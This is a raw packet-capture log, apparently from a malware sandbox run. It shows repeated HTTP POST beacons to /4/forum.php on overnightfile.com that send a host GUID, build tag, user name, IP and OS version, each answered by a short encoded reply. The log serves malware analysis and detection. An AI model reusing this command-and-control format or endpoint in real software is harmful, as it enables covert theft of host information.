                                                                                                                                      Jul 14, 2020 11:22:04.555804968 CEST890OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:04.646260977 CEST890INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:04 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 56 45 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHVESARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:04.999409914 CEST891OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:05.090301991 CEST891INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:04 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCAZXARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:05.410897970 CEST891OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:05.513786077 CEST | 892 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 47 41 5a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cGAZTARRABw==0
Jul 14, 2020 11:22:05.845410109 CEST | 892 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:05.934211969 CEST | 893 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZBYAARRABw==0
Jul 14, 2020 11:22:06.318648100 CEST | 893 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:06.409316063 CEST | 895 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 48 43 58 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cHCXSARRABw==0
Jul 14, 2020 11:22:06.795124054 CEST | 896 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:06.887067080 CEST | 896 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cYHSBARRABw==0
Jul 14, 2020 11:22:07.203433037 CEST | 896 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:07.291778088 CEST | 897 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNZAMARRABw==0
Jul 14, 2020 11:22:07.598186016 CEST | 897 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:07.690946102 CEST | 897 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4a 4d 4e 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cJMNQARRABw==0
Jul 14, 2020 11:22:08.014770985 CEST | 898 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:08.102183104 CEST | 898 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 51 4a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cCQJXARRABw==0
Jul 14, 2020 11:22:08.406220913 CEST | 899 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:08.494173050 CEST | 899 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZKPAARRABw==0
Jul 14, 2020 11:22:08.816091061 CEST | 899 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:08.903805017 CEST | 899 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZKPAARRABw==0
Jul 14, 2020 11:22:09.197422981 CEST | 900 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:09.287599087 CEST | 900 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBNMYARRABw==0
Jul 14, 2020 11:22:09.590527058 CEST | 901 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:09.682044029 CEST | 901 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMJQNARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:10.301146030 CEST901OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:10.389384031 CEST902INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:09 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 56 45 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQVEJARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:10.741204023 CEST902OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:10.832273006 CEST902INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:10 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZJQAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:11.658440113 CEST903OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:11.747596025 CEST903INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:11 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZHSAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:12.201524973 CEST903OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:12.292340040 CEST904INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:11 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQYBJARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:13.004404068 CEST904OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:13.092058897 CEST904INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:12 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 43 58 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZCXAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:13.399946928 CEST905OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:13.490073919 CEST905INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:13 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cTHSGARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:13.793641090 CEST906OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
